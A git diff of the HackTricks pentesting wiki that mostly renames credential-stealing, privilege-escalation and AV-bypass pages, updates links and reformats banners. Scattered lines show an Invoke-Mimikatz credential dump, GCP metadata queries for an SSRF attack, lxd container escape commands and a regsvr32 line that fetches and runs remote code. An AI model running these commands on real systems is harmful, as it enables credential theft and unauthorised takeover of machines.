diff --git a/SUMMARY.md b/SUMMARY.md index 5e600649b..22d317c6d 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -103,8 +103,8 @@ * [Logstash](linux-hardening/privilege-escalation/logstash.md) * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md) * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) - * [Interesting Groups - Linux Privesc](linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md) - * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md) + * [Interesting Groups - Linux Privesc](linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md) + * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md) * [ld.so privesc exploit example](linux-hardening/privilege-escalation/ld.so.conf-example.md) * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md) * [Linux Capabilities](linux-hardening/privilege-escalation/linux-capabilities.md) 
@@ -215,13 +215,13 @@ * [WinRM](windows-hardening/ntlm/winrm.md) * [WmicExec](windows-hardening/ntlm/wmicexec.md) * [Pivoting to the Cloud](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements) -* [Stealing Windows Credentials](windows-hardening/stealing-windows-credentials/README.md) - * [Windows Credentials Protections](windows-hardening/stealing-windows-credentials/windows-credentials-protections.md) - * [Mimikatz](windows-hardening/stealing-windows-credentials/credentials-mimikatz.md) -* [Basic Win CMD for Pentesters](windows-hardening/basic-win-cmd-for-pentesters.md) +* [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md) + * [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md) + * [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md) +* [Basic Win CMD for Pentesters](windows-hardening/basic-cmd-for-pentesters.md) * [Basic PowerShell for Pentesters](windows-hardening/basic-powershell-for-pentesters/README.md) * [PowerView/SharpView](windows-hardening/basic-powershell-for-pentesters/powerview.md) -* [AV Bypass](windows-hardening/windows-av-bypass.md) +* [AV Bypass](windows-hardening/av-bypass.md) ## 📱 Mobile Pentesting diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md index 260564bdf..525924f4c 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md 
@@ -204,7 +204,7 @@ The **`$BitMap`** is a special file within the NTFS file system. This file keeps ### ADS (Alternate Data Stream) Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\ -In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-win-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`. +In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`. Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate\_data\_streams.html) you can search and export all the files with some ADS. diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index 6c97f9cf5..e00399ace 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md 
@@ -152,7 +152,7 @@ The plugin `banners.Banners` can be used in **vol3 to try to find linux banners* ## Hashes/Passwords -Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-windows-credentials/windows-credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). +Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets). {% tabs %} {% tab title="vol3" %} diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 25d68dd86..58c95b252 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -91,7 +91,7 @@ Specially in Windows you could need some help to **avoid antiviruses**: \[Check If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters: * [**Linux**](../linux-hardening/useful-linux-commands/) -* [**Windows (CMD)**](../windows-hardening/basic-win-cmd-for-pentesters.md) +* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) * [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) ### **9 -** [**Exfiltration**](exfiltration.md) 
@@ -108,7 +108,7 @@ You should also check this pages about how does **Windows work**: * [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) * How does [**NTLM works**](../windows-hardening/ntlm/) -* How to [**steal credentials**](../windows-hardening/stealing-windows-credentials/) in Windows +* How to [**steal credentials**](../windows-hardening/stealing-credentials/) in Windows * Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) **Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) @@ -122,7 +122,7 @@ Here you can find a [**methodology explaining the most common actions to enumera #### **11**.1 - Looting Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\ -Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-windows-credentials/). +Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-credentials/). #### 11.2 - Persistence diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index a5d336924..96dcdab95 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md 
@@ -91,7 +91,7 @@ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among * [ ] Generic users/groups **enumeration** * [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**? -* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-privesc/) you belong to? +* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to? * [ ] **Clipboard** data? * [ ] Password Policy? * [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without a password. diff --git a/linux-hardening/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md index 7a81a5e23..ecefe85b8 100644 --- a/linux-hardening/privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/README.md @@ -638,7 +638,7 @@ Now, you can execute commands on the container from this `socat` connection. ### Others -Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-privesc/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). Check **more ways to break out from docker or abuse it to escalate privileges** in: 
@@ -775,8 +775,8 @@ Some Linux versions were affected by a bug that allows users with **UID > INT\_M Check if you are a **member of some group** that could grant you root privileges: -{% content-ref url="interesting-groups-linux-privesc/" %} -[interesting-groups-linux-privesc](interesting-groups-linux-privesc/) +{% content-ref url="interesting-groups-linux-pe/" %} +[interesting-groups-linux-pe](interesting-groups-linux-pe/) {% endcontent-ref %} ### Clipboard @@ -1500,7 +1500,7 @@ aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` -In order to **read logs the group** [**adm**](interesting-groups-linux-privesc/#adm-group) will be really helpful. +In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. ### Shell files diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md similarity index 90% rename from linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md rename to linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index 2e4672fa6..43f72fe53 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -1,14 +1,14 @@ -# Interesting Groups - Linux PE +# Interesting Groups - Linux Privesc
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -215,12 +215,12 @@ These permissions may be abused with the following exploit to **escalate privile
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md similarity index 73% rename from linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md rename to linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md index 2aaa4f811..25601075d 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -1,27 +1,22 @@ - +# lxd/lxc Group - Privilege escalation
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root -# Exploiting without internet +## Exploiting without internet -## Method 1 +### Method 1 You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github): @@ -74,7 +69,7 @@ lxc exec privesc /bin/sh [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` -## Method 2 +### Method 2 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. @@ -104,7 +99,7 @@ lxc exec mycontainer /bin/sh Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root) -# With internet +## With internet You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). @@ -116,25 +111,18 @@ lxc exec test bash [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` -# Other Refs +## Other Refs {% embed url="https://reboare.github.io/lxd/lxd-escape.html" %} -
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
- - diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 72b52ed39..d68fbbd26 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -201,9 +201,11 @@ curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/ins # Name curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name # Tags -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags +curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags # Zone -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone +curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone +# User data +curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script" # Network Interfaces for iface in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do echo " IP: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip") diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index b408df987..3868cb6e2 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md 
@@ -171,7 +171,7 @@ Having compromised an account is a **big step to start compromising the whole do Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords. -* You could use the [**CMD to perform a basic recon**](../basic-win-cmd-for-pentesters.md#domain-info) +* You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info) * You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier * You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information * Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc. 
@@ -254,7 +254,7 @@ This vulnerability allowed any authenticated user to **compromise the domain con Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/).\ Then, its time to dump all the hashes in memory and locally.\ -[**Read this page about different ways to obtain the hashes.**](../stealing-windows-credentials/) +[**Read this page about different ways to obtain the hashes.**](../stealing-credentials/) ### Pass the Hash @@ -383,7 +383,7 @@ Once you get **Domain Admin** or even better **Enterprise Admin** privileges, yo [**More information about DCSync attack can be found here**](dcsync.md). -[**More information about how to steal the NTDS.dit can be found here**](../stealing-windows-credentials/) +[**More information about how to steal the NTDS.dit can be found here**](../stealing-credentials/) ### Privesc as Persistence @@ -672,7 +672,7 @@ Moreover, if the **victim mounted his hard drive**, from the **RDP session** pro ## Some General Defenses -[**Learn more about how to protect credentials here.**](../stealing-windows-credentials/windows-credentials-protections.md)\ +[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)\ **Please, find some migrations against each technique in the description of the technique.** * Not allow Domain Admins to login on any other hosts apart from Domain Controllers 
diff --git a/windows-hardening/windows-av-bypass.md b/windows-hardening/av-bypass.md similarity index 100% rename from windows-hardening/windows-av-bypass.md rename to windows-hardening/av-bypass.md diff --git a/windows-hardening/basic-win-cmd-for-pentesters.md b/windows-hardening/basic-cmd-for-pentesters.md similarity index 95% rename from windows-hardening/basic-win-cmd-for-pentesters.md rename to windows-hardening/basic-cmd-for-pentesters.md index 9bf5adf01..f60a44631 100644 --- a/windows-hardening/basic-win-cmd-for-pentesters.md +++ b/windows-hardening/basic-cmd-for-pentesters.md @@ -1,14 +1,14 @@ -# Basic CMD for Pentesters +# Basic Win CMD for Pentesters
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -672,12 +672,12 @@ regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSB
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/windows-hardening/ntlm/README.md b/windows-hardening/ntlm/README.md index 6042cf3c7..456c5a976 100644 --- a/windows-hardening/ntlm/README.md +++ b/windows-hardening/ntlm/README.md @@ -189,7 +189,7 @@ wce.exe -s ::: ## Extracting credentials from a Windows Host -**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-windows-credentials/)**.** +**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-credentials/)**.** ## NTLM Relay and Responder diff --git a/windows-hardening/stealing-windows-credentials/README.md b/windows-hardening/stealing-credentials/README.md similarity index 98% rename from windows-hardening/stealing-windows-credentials/README.md rename to windows-hardening/stealing-credentials/README.md index 3bdd08331..52198b942 100644 --- a/windows-hardening/stealing-windows-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -49,7 +49,7 @@ Invoke-Mimikatz -DumpCreds #Dump creds from memory Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"' ``` -[**Learn about some possible credentials protections here.**](windows-credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** +[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** ## Credentials with Meterpreter @@ -330,7 +330,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco ## Defenses -[**Learn about some credentials protections here.**](windows-credentials-protections.md) +[**Learn about some credentials protections here.**](credentials-protections.md) ​ 
diff --git a/windows-hardening/stealing-windows-credentials/credentials-mimikatz.md b/windows-hardening/stealing-credentials/credentials-mimikatz.md similarity index 93% rename from windows-hardening/stealing-windows-credentials/credentials-mimikatz.md rename to windows-hardening/stealing-credentials/credentials-mimikatz.md index 6bcf8866d..2fbe7e0ae 100644 --- a/windows-hardening/stealing-windows-credentials/credentials-mimikatz.md +++ b/windows-hardening/stealing-credentials/credentials-mimikatz.md @@ -2,17 +2,13 @@
-🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 +🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
